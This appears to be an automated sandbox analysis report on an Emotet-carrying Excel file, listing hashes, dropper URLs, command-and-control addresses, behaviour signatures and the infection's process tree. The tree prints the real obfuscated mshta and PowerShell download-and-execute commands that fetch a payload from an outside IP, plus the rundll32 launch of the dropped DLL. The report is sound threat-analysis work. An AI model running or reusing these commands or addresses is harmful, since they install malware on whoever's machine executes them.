Analysis

  • max time kernel
    130s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:03

General

  • Target

    form.xls

  • Size

    46KB

  • MD5

    b6949fd848a702a27dc5812812d4e01a

  • SHA1

    387adf8b0e89ad474bbac461199766f81e0f5473

  • SHA256

    f7e693405dae9404a1058fae644bfc776d6b799528e30831307f9543256a50fc

  • SHA512

    31dca1398a62d3a576653f998ca083f36479f354936276996a42b0fb1befe73e9c60e7bec3d502a1e84783102edde1fcc279459a59bdaa1279effe6762c41a10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\form.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3764
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3636
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1368
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1976
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ofspgoosbgaqi\qpwcihdzjuvuk.nte",AHIxX
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2212
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ofspgoosbgaqi\qpwcihdzjuvuk.nte",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:652
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3816 -s 1796
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2440

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    047c2356f6fca3412dcac51cfba937c4

    SHA1

    9fb1a5e24e77767cf157879bb02eff71692eba2e

    SHA256

    20c15e85b846dca4beb07a229749ebe688ef5af18617a79739895264f59c4564

    SHA512

    c47236585104b733476cb7f37627431f03e8b5079b9a31e8b466657a796538ad690adc8c0b41c6c1340a978b38a052c8993eb1b79b1685f8da3d9fd640caeba3

  • \ProgramData\QWER.dll
    MD5

    047c2356f6fca3412dcac51cfba937c4

    SHA1

    9fb1a5e24e77767cf157879bb02eff71692eba2e

    SHA256

    20c15e85b846dca4beb07a229749ebe688ef5af18617a79739895264f59c4564

    SHA512

    c47236585104b733476cb7f37627431f03e8b5079b9a31e8b466657a796538ad690adc8c0b41c6c1340a978b38a052c8993eb1b79b1685f8da3d9fd640caeba3

  • \ProgramData\QWER.dll
    MD5

    047c2356f6fca3412dcac51cfba937c4

    SHA1

    9fb1a5e24e77767cf157879bb02eff71692eba2e

    SHA256

    20c15e85b846dca4beb07a229749ebe688ef5af18617a79739895264f59c4564

    SHA512

    c47236585104b733476cb7f37627431f03e8b5079b9a31e8b466657a796538ad690adc8c0b41c6c1340a978b38a052c8993eb1b79b1685f8da3d9fd640caeba3

  • memory/652-382-0x0000000004920000-0x0000000004945000-memory.dmp
    Filesize

    148KB

  • memory/652-379-0x0000000000B90000-0x0000000000BB5000-memory.dmp
    Filesize

    148KB

  • memory/1976-350-0x0000000004750000-0x0000000004775000-memory.dmp
    Filesize

    148KB

  • memory/2212-377-0x0000000002F50000-0x0000000002F75000-memory.dmp
    Filesize

    148KB

  • memory/2284-372-0x00000000048E0000-0x0000000004905000-memory.dmp
    Filesize

    148KB

  • memory/2284-353-0x0000000004030000-0x0000000004055000-memory.dmp
    Filesize

    148KB

  • memory/2284-376-0x0000000004B00000-0x0000000004B25000-memory.dmp
    Filesize

    148KB

  • memory/2284-374-0x0000000004940000-0x0000000004965000-memory.dmp
    Filesize

    148KB

  • memory/2284-370-0x0000000004880000-0x00000000048A5000-memory.dmp
    Filesize

    148KB

  • memory/2284-368-0x0000000004720000-0x0000000004745000-memory.dmp
    Filesize

    148KB

  • memory/2284-361-0x0000000004640000-0x0000000004665000-memory.dmp
    Filesize

    148KB

  • memory/3488-121-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-120-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-124-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-132-0x00007FFF61D50000-0x00007FFF61D60000-memory.dmp
    Filesize

    64KB

  • memory/3488-417-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-131-0x00007FFF61D50000-0x00007FFF61D60000-memory.dmp
    Filesize

    64KB

  • memory/3488-416-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-118-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-415-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-414-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3488-119-0x00007FFF65860000-0x00007FFF65870000-memory.dmp
    Filesize

    64KB

  • memory/3636-339-0x000001B9D8CC0000-0x000001B9F0E20000-memory.dmp
    Filesize

    385.4MB

  • memory/3636-330-0x000001B9D8CC0000-0x000001B9F0E20000-memory.dmp
    Filesize

    385.4MB

  • memory/3636-319-0x000001B9F0D70000-0x000001B9F0DAC000-memory.dmp
    Filesize

    240KB

  • memory/3636-331-0x000001B9F14D0000-0x000001B9F1546000-memory.dmp
    Filesize

    472KB

  • memory/3636-338-0x000001B9D8CC0000-0x000001B9F0E20000-memory.dmp
    Filesize

    385.4MB

  • memory/3636-299-0x000001B9D8C50000-0x000001B9D8C72000-memory.dmp
    Filesize

    136KB